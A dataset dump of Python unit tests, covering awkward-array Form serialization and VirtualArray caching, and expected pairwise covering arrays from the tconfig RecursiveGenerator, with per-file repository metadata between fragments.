"primitive": "float64",
}
assert json.loads(str(form.content("1"))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.RegularForm(
ak.forms.NumpyForm([], 8, "d"),
10,
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "RegularArray",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"size": 10,
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "RegularArray",
"content": "float64",
"size": 10,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.size == 10
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.UnionForm(
"i8",
"i64",
[ak.forms.NumpyForm([], 8, "d"), ak.forms.NumpyForm([], 1, "?")],
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "UnionArray8_64",
"tags": "i8",
"index": "i64",
"contents": [
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 1,
"format": "?",
"primitive": "bool",
"has_identities": False,
"parameters": {},
"form_key": None,
},
],
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "UnionArray8_64",
"tags": "i8",
"index": "i64",
"contents": ["float64", "bool"],
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.tags == "i8"
assert form.index == "i64"
assert json.loads(str(form.contents)) == [
{"class": "NumpyArray", "itemsize": 8, "format": "d", "primitive": "float64"},
{"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
]
assert json.loads(str(form.content(0))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content(1))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.UnmaskedForm(
ak.forms.NumpyForm([], 8, "d"), parameters={"hey": ["you"]}, form_key="yowzers"
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "UnmaskedArray",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "UnmaskedArray",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.VirtualForm(ak.forms.NumpyForm([], 8, "d"), True)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.form.inner_shape == []
assert form.form.itemsize == 8
assert form.form.primitive == "float64"
assert form.form.has_identities is False
assert form.form.parameters == {}
assert form.has_length is True
assert form.parameters == {}
assert json.loads(form.tojson(False, True)) == {
"class": "VirtualArray",
"form": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_length": True,
"has_identities": False,
"parameters": {},
"form_key": None,
}
assert json.loads(str(form)) == {
"class": "VirtualArray",
"form": "float64",
"has_length": True,
}
form = ak.forms.VirtualForm(None, False)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.form is None
assert form.has_length is False
assert form.parameters == {}
assert json.loads(form.tojson(False, True)) == {
"class": "VirtualArray",
"form": None,
"has_length": False,
"has_identities": False,
"parameters": {},
"form_key": None,
}
assert json.loads(str(form)) == {
"class": "VirtualArray",
"form": None,
"has_length": False,
}
def fcn():
return ak.layout.NumpyArray(np.array([1.1, 2.2, 3.3, 4.4, 5.5]))
def test_basic():
generator = ak.layout.ArrayGenerator(
fcn, form=ak.forms.NumpyForm([], 8, "d"), length=5
)
d = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(d)
virtualarray = ak.layout.VirtualArray(generator, cache)
assert virtualarray.peek_array is None
assert virtualarray.array is not None
assert ak.to_list(virtualarray.peek_array) == [1.1, 2.2, 3.3, 4.4, 5.5]
assert ak.to_list(virtualarray.array) == [1.1, 2.2, 3.3, 4.4, 5.5]
assert ak.to_list(d[virtualarray.cache_key]) == [1.1, 2.2, 3.3, 4.4, 5.5]
cache = ak.layout.ArrayCache(None)
virtualarray = ak.layout.VirtualArray(generator, cache)
assert virtualarray.peek_array is None
assert virtualarray.array is not None
assert virtualarray.peek_array is None
assert ak.to_list(virtualarray.array) == [1.1, 2.2, 3.3, 4.4, 5.5]
def test_slice():
generator = ak.layout.ArrayGenerator(
lambda: ak.Array(
[[1.1, 2.2, 3.3, 4.4, 5.5], [6.6, 7.7, 8.8], [100, 200, 300, 400]]
),
length=3,
)
virtualarray = ak.layout.VirtualArray(generator)
assert isinstance(virtualarray, ak.layout.VirtualArray)
sliced = virtualarray[:-1]
assert isinstance(sliced, ak.layout.VirtualArray)
assert isinstance(sliced[1], ak.layout.NumpyArray)
def test_field():
generator = ak.layout.ArrayGenerator(
lambda: ak.Array(
[
{"x": 0.0, "y": []},
{"x": 1.1, "y": [1]},
{"x": 2.2, "y": [2, 2]},
{"x": 3.3, "y": [3, 3, 3]},
]
)
)
virtualarray = ak.layout.VirtualArray(generator)
assert isinstance(virtualarray, ak.layout.VirtualArray)
sliced = virtualarray["y"]
assert isinstance(sliced, ak.layout.VirtualArray)
assert isinstance(sliced[1], ak.layout.NumpyArray)
def test_single_level():
template = ak.Array(
[
[{"x": 0.0, "y": []}, {"x": 1.1, "y": [1]}, {"x": 2.2, "y": [2, 2]}],
[],
[{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}],
]
)
generator = ak.layout.ArrayGenerator(
lambda: template, form=template.layout.form, length=3
)
d = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(d)
virtualarray = ak.layout.VirtualArray(generator, cache)
a = virtualarray[2]
assert isinstance(a, ak.layout.RecordArray)
assert len(d) == 1
assert ak.to_list(a) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray[1:]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[1]
assert isinstance(b, ak.layout.RecordArray)
assert len(d) >= 1
assert ak.to_list(b) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray[[0, 2, 1, 0]]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[1]
assert isinstance(b, ak.layout.RecordArray)
assert len(d) >= 1
assert ak.to_list(b) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray[[False, True, True]]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[1]
assert isinstance(b, ak.layout.RecordArray)
assert len(d) >= 1
assert ak.to_list(b) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray["x"]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[2]
assert isinstance(b, ak.layout.NumpyArray)
assert len(d) >= 1
assert ak.to_list(b) == [3.3, 4.4]
d.clear()
a = virtualarray["y"]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[2]
assert isinstance(b, (ak.layout.ListArray64, ak.layout.ListOffsetArray64))
assert len(d) >= 1
assert ak.to_list(b) == [[3, 3, 3], [4, 4, 4, 4]]
d.clear()
a = virtualarray[::2, 1]
assert isinstance(a, (ak.layout.RecordArray, ak.layout.IndexedArray64))
assert len(d) >= 1
assert ak.to_list(a) == [{"x": 1.1, "y": [1]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
def test_iter():
generator = ak.layout.ArrayGenerator(
fcn, form=ak.forms.NumpyForm([], 8, "d"), length=5
)
d = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(d)
virtualarray = ak.layout.VirtualArray(generator, cache)
assert len(d) == 0
it = iter(virtualarray)
assert len(d) == 1
d.clear()
assert len(d) == 0
assert next(it) == 1.1
assert len(d) == 0
assert list(it) == [2.2, 3.3, 4.4, 5.5]
assert len(d) == 0
def test_nested_virtualness():
counter = [0, 0]
content = ak.layout.NumpyArray(
np.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
)
def materialize1():
counter[1] += 1
return content
generator1 = ak.layout.ArrayGenerator(
materialize1, form=content.form, length=len(content)
)
virtual1 = ak.layout.VirtualArray(generator1)
offsets = ak.layout.Index64(np.array([0, 3, 3, 5, 6, 10], dtype=np.int64))
listarray = ak.layout.ListOffsetArray64(offsets, virtual1)
def materialize2():
counter[0] += 1
return listarray
generator2 = ak.layout.ArrayGenerator(
materialize2, form=listarray.form, length=len(listarray)
)
virtual2 = ak.layout.VirtualArray(generator2)
assert counter == [0, 0]
tmp1 = virtual2[2]
assert isinstance(tmp1, ak.layout.VirtualArray)
assert counter == [1, 0]
tmp2 = tmp1[1]
assert tmp2 == 4.4
assert counter == [1, 1]
def test_highlevel():
array = ak.virtual(lambda: [[1.1, 2.2, 3.3], [], [4.4, 5.5]])
assert isinstance(array.layout, ak.layout.VirtualArray)
assert ak.to_list(array) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]
counter = [0]
def generate():
counter[0] += 1
return [[1.1, 2.2, 3.3], [], [4.4, 5.5]]
array = ak.virtual(
generate,
length=3,
form={"class": "ListOffsetArray64", "offsets": "i64", "content": "float64"},
)
assert counter[0] == 0
assert len(array) == 3
assert counter[0] == 0
assert str(ak.type(array)) == "3 * var * float64"
assert counter[0] == 0
assert ak.to_list(array[2]) == [4.4, 5.5]
assert counter[0] == 1
| 31.190148
| 88
| 0.515825
| 3,427
| 31,658
| 4.710242
| 0.049898
| 0.06195
| 0.04925
| 0.048321
| 0.896048
| 0.864019
| 0.845496
| 0.82053
| 0.810804
| 0.798228
| 0
| 0.029837
| 0.29705
| 31,658
| 1,014
| 89
| 31.220907
| 0.695515
| 0.003727
| 0
| 0.738854
| 0
| 0
| 0.17739
| 0
| 0
| 0
| 0
| 0
| 0.286624
| 1
| 0.012739
| false
| 0
| 0.005308
| 0.001062
| 0.022293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53c36907bdf7669e712119ed94d341b9de1642fd
| 19,251
|
py
|
Python
|
tconfig/tests/core/algorithms/recursive/test_recursive_gen.py
|
awwilliams/tconfig
|
e798ca7d85a61c53df07b61440b321dbd3793350
|
[
"MIT"
] | null | null | null |
tconfig/tests/core/algorithms/recursive/test_recursive_gen.py
|
awwilliams/tconfig
|
e798ca7d85a61c53df07b61440b321dbd3793350
|
[
"MIT"
] | null | null | null |
tconfig/tests/core/algorithms/recursive/test_recursive_gen.py
|
awwilliams/tconfig
|
e798ca7d85a61c53df07b61440b321dbd3793350
|
[
"MIT"
] | null | null | null |
"""
Created on Sep 30, 2017
@author: Alan Williams
"""
import numpy as np
from tconfig.core.data import DEFAULT_NDARRAY_TYPE, ParameterSet
from tconfig.core.algorithms import RecursiveGenerator
# pylint: disable=invalid-name
def test_generate_configurations():
ps = ParameterSet.create_from_parm_and_value_sizes(13, 3)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 2, 2, 1, 2, 2, 2, 1, 2, 2, 2, 1],
[1, 3, 3, 3, 1, 3, 3, 3, 1, 3, 3, 3, 1],
[2, 1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3, 1],
[2, 2, 3, 1, 2, 2, 3, 1, 2, 2, 3, 1, 0],
[2, 3, 1, 2, 2, 3, 1, 2, 2, 3, 1, 2, 0],
[3, 1, 3, 2, 3, 1, 3, 2, 3, 1, 3, 2, 1],
[3, 2, 1, 3, 3, 2, 1, 3, 3, 2, 1, 3, 0],
[3, 3, 2, 1, 3, 3, 2, 1, 3, 3, 2, 1, 0],
[1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 2],
[2, 2, 2, 2, 3, 3, 3, 3, 1, 1, 1, 1, 2],
[3, 3, 3, 3, 1, 1, 1, 1, 2, 2, 2, 2, 2],
[1, 1, 1, 1, 3, 3, 3, 3, 2, 2, 2, 2, 3],
[2, 2, 2, 2, 1, 1, 1, 1, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 2, 2, 2, 2, 1, 1, 1, 1, 3],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations2():
ps = ParameterSet.create_from_parm_and_value_sizes(4, 3)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[1, 2, 2, 2],
[1, 3, 3, 3],
[2, 1, 2, 3],
[2, 2, 3, 1],
[2, 3, 1, 2],
[3, 1, 3, 2],
[3, 2, 1, 3],
[3, 3, 2, 1],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations3():
ps = ParameterSet.create_from_parm_and_value_sizes(2, 3)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1],
[2, 2],
[3, 3],
[2, 3],
[3, 1],
[1, 2],
[3, 2],
[1, 3],
[2, 1],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations4():
ps = ParameterSet.create_from_value_sizes([2, 3, 2])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1],
[1, 2, 2],
[2, 1, 2],
[2, 2, 1],
[1, 3, 1],
[2, 3, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations5():
ps = ParameterSet.create_from_parm_and_value_sizes(8, 2)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 1, 2, 2, 1, 2, 2],
[1, 2, 2, 1, 2, 2, 1, 2],
[2, 1, 2, 2, 1, 2, 2, 1],
[1, 1, 2, 2, 2, 2, 2, 2],
[2, 2, 1, 1, 1, 2, 2, 2],
[2, 2, 2, 2, 2, 1, 1, 1],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations6():
ps = ParameterSet.create_from_value_sizes([2, 4, 2, 2])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[1, 2, 2, 1],
[2, 1, 2, 1],
[2, 2, 1, 0],
[2, 2, 2, 2],
[1, 1, 1, 2],
[1, 3, 1, 1],
[2, 3, 2, 2],
[1, 4, 1, 1],
[2, 4, 2, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations7():
ps = ParameterSet.create_from_parm_and_value_sizes(4, 6)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4],
[5, 5, 5, 5],
[6, 6, 6, 6],
[3, 4, 5, 6],
[4, 5, 6, 0],
[5, 6, 0, 1],
[6, 0, 1, 2],
[0, 1, 2, 3],
[1, 2, 3, 4],
[2, 3, 4, 5],
[6, 1, 3, 5],
[0, 2, 4, 6],
[1, 3, 5, 0],
[2, 4, 6, 1],
[3, 5, 0, 2],
[4, 6, 1, 3],
[5, 0, 2, 4],
[2, 5, 1, 4],
[3, 6, 2, 5],
[4, 0, 3, 6],
[5, 1, 4, 0],
[6, 2, 5, 1],
[0, 3, 6, 2],
[1, 4, 0, 3],
[5, 2, 6, 3],
[6, 3, 0, 4],
[0, 4, 1, 5],
[1, 5, 2, 6],
[2, 6, 3, 0],
[3, 0, 4, 1],
[4, 1, 5, 2],
[1, 6, 4, 2],
[2, 0, 5, 3],
[3, 1, 6, 4],
[4, 2, 0, 5],
[5, 3, 1, 6],
[6, 4, 2, 0],
[0, 5, 3, 1],
[4, 3, 2, 1],
[5, 4, 3, 2],
[6, 5, 4, 3],
[0, 6, 5, 4],
[1, 0, 6, 5],
[2, 1, 0, 6],
[3, 2, 1, 0],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations8():
ps = ParameterSet.create_from_parm_and_value_sizes(9, 6)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 2, 2, 2, 2, 2, 2, 2, 2],
[0, 3, 3, 3, 3, 3, 3, 3, 3],
[0, 4, 4, 4, 4, 4, 4, 4, 4],
[0, 5, 5, 5, 5, 5, 5, 5, 5],
[0, 6, 6, 6, 6, 6, 6, 6, 6],
[0, 0, 0, 1, 2, 3, 4, 5, 6],
[0, 0, 0, 2, 1, 4, 3, 6, 5],
[0, 1, 2, 0, 0, 5, 6, 3, 4],
[0, 2, 1, 0, 0, 6, 5, 4, 3],
[0, 3, 4, 5, 6, 0, 0, 1, 2],
[0, 4, 3, 6, 5, 0, 0, 2, 1],
[0, 5, 6, 3, 4, 1, 2, 0, 0],
[0, 6, 5, 4, 3, 2, 1, 0, 0],
[1, 0, 1, 3, 5, 2, 0, 6, 4],
[1, 0, 2, 4, 6, 1, 0, 5, 3],
[1, 1, 0, 5, 3, 0, 2, 4, 6],
[1, 2, 0, 6, 4, 0, 1, 3, 5],
[1, 3, 5, 0, 1, 6, 4, 2, 0],
[1, 4, 6, 0, 2, 5, 3, 1, 0],
[1, 5, 3, 1, 0, 4, 6, 0, 2],
[1, 6, 4, 2, 0, 3, 5, 0, 1],
[2, 0, 2, 5, 4, 6, 3, 0, 1],
[2, 0, 1, 6, 3, 5, 4, 0, 2],
[2, 1, 0, 3, 6, 4, 5, 2, 0],
[2, 2, 0, 4, 5, 3, 6, 1, 0],
[2, 3, 6, 1, 0, 2, 0, 4, 5],
[2, 4, 5, 2, 0, 1, 0, 3, 6],
[2, 5, 4, 0, 2, 0, 1, 6, 3],
[2, 6, 3, 0, 1, 0, 2, 5, 4],
[3, 0, 3, 2, 6, 5, 1, 4, 0],
[3, 0, 4, 1, 5, 6, 2, 3, 0],
[3, 1, 5, 0, 4, 3, 0, 6, 2],
[3, 2, 6, 0, 3, 4, 0, 5, 1],
[3, 3, 0, 6, 2, 1, 5, 0, 4],
[3, 4, 0, 5, 1, 2, 6, 0, 3],
[3, 5, 1, 4, 0, 0, 3, 2, 6],
[3, 6, 2, 3, 0, 0, 4, 1, 5],
[4, 0, 4, 0, 3, 1, 6, 2, 5],
[4, 0, 3, 0, 4, 2, 5, 1, 6],
[4, 1, 6, 2, 5, 0, 4, 0, 3],
[4, 2, 5, 1, 6, 0, 3, 0, 4],
[4, 3, 0, 4, 0, 5, 2, 6, 1],
[4, 4, 0, 3, 0, 6, 1, 5, 2],
[4, 5, 2, 6, 1, 3, 0, 4, 0],
[4, 6, 1, 5, 2, 4, 0, 3, 0],
[5, 0, 5, 6, 0, 4, 2, 1, 3],
[5, 0, 6, 5, 0, 3, 1, 2, 4],
[5, 1, 3, 4, 2, 6, 0, 0, 5],
[5, 2, 4, 3, 1, 5, 0, 0, 6],
[5, 3, 1, 2, 4, 0, 6, 5, 0],
[5, 4, 2, 1, 3, 0, 5, 6, 0],
[5, 5, 0, 0, 6, 2, 4, 3, 1],
[5, 6, 0, 0, 5, 1, 3, 4, 2],
[6, 0, 6, 4, 1, 0, 5, 3, 2],
[6, 0, 5, 3, 2, 0, 6, 4, 1],
[6, 1, 4, 6, 0, 2, 3, 5, 0],
[6, 2, 3, 5, 0, 1, 4, 6, 0],
[6, 3, 2, 0, 5, 4, 1, 0, 6],
[6, 4, 1, 0, 6, 3, 2, 0, 5],
[6, 5, 0, 2, 3, 6, 0, 1, 4],
[6, 6, 0, 1, 4, 5, 0, 2, 3],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations9():
ps = ParameterSet.create_from_parm_and_value_sizes(16, 2)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1],
[2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 1],
[2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 0],
[2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1],
[1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 0],
[2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],
[2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations10():
ps = ParameterSet.create_from_parm_and_value_sizes(32, 2)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
],
[
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
1,
1,
],
[
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
1,
1,
1,
],
[
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
2,
2,
1,
0,
0,
0,
],
[
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
],
[
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
0,
0,
0,
],
[
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
2,
2,
2,
2,
2,
2,
1,
1,
1,
1,
1,
1,
],
[
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
0,
],
[
2,
2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
1,
],
[
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
1,
2,
2,
],
[
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
1,
2,
],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations11():
ps = ParameterSet.create_from_value_sizes([6, 6, 8, 6])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4],
[5, 5, 5, 5],
[6, 6, 6, 6],
[0, 0, 7, 0],
[4, 5, 6, 0],
[5, 6, 7, 1],
[6, 0, 1, 2],
[0, 1, 2, 3],
[1, 2, 3, 4],
[2, 3, 4, 5],
[3, 4, 5, 6],
[0, 2, 4, 6],
[1, 3, 5, 0],
[2, 4, 6, 1],
[3, 5, 7, 2],
[4, 6, 1, 3],
[5, 0, 2, 4],
[6, 1, 3, 5],
[3, 6, 2, 5],
[4, 0, 3, 6],
[5, 1, 4, 0],
[6, 2, 5, 1],
[0, 3, 6, 2],
[1, 4, 7, 3],
[2, 5, 1, 4],
[6, 3, 7, 4],
[0, 4, 1, 5],
[1, 5, 2, 6],
[2, 6, 3, 0],
[3, 0, 4, 1],
[4, 1, 5, 2],
[5, 2, 6, 3],
[2, 0, 5, 3],
[3, 1, 6, 4],
[4, 2, 7, 5],
[5, 3, 1, 6],
[6, 4, 2, 0],
[0, 5, 3, 1],
[1, 6, 4, 2],
[5, 4, 3, 2],
[6, 5, 4, 3],
[0, 6, 5, 4],
[1, 0, 6, 5],
[2, 1, 7, 6],
[3, 2, 1, 0],
[4, 3, 2, 1],
[1, 1, 8, 1],
[2, 2, 8, 2],
[3, 3, 8, 3],
[4, 4, 8, 4],
[5, 5, 8, 5],
[6, 6, 8, 6],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations_web_example():
ps = ParameterSet.create_from_value_sizes([3, 8, 2, 2])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[1, 2, 2, 2],
[1, 3, 0, 0],
[2, 1, 2, 0],
[2, 2, 0, 1],
[2, 3, 1, 2],
[3, 1, 0, 2],
[3, 2, 1, 0],
[3, 3, 2, 1],
[1, 4, 1, 1],
[2, 4, 2, 2],
[3, 4, 0, 0],
[1, 5, 1, 1],
[2, 5, 2, 2],
[3, 5, 0, 0],
[1, 6, 1, 1],
[2, 6, 2, 2],
[3, 6, 0, 0],
[1, 7, 1, 1],
[2, 7, 2, 2],
[3, 7, 0, 0],
[1, 8, 1, 1],
[2, 8, 2, 2],
[3, 8, 0, 0],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
| 23.796044
| 64
| 0.237702
| 2,413
| 19,251
| 1.828429
| 0.028595
| 0.126927
| 0.126473
| 0.127833
| 0.821623
| 0.769719
| 0.733228
| 0.704896
| 0.63146
| 0.606754
| 0
| 0.267951
| 0.61441
| 19,251
| 808
| 65
| 23.825495
| 0.326418
| 0.004
| 0
| 0.711052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015979
| 1
| 0.015979
| false
| 0
| 0.003995
| 0
| 0.019973
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
99061f4967a3b849d2bc40f36354244f8748821b
| 188
|
py
|
Python
|
multiworld/world/__init__.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | null | null | null |
multiworld/world/__init__.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
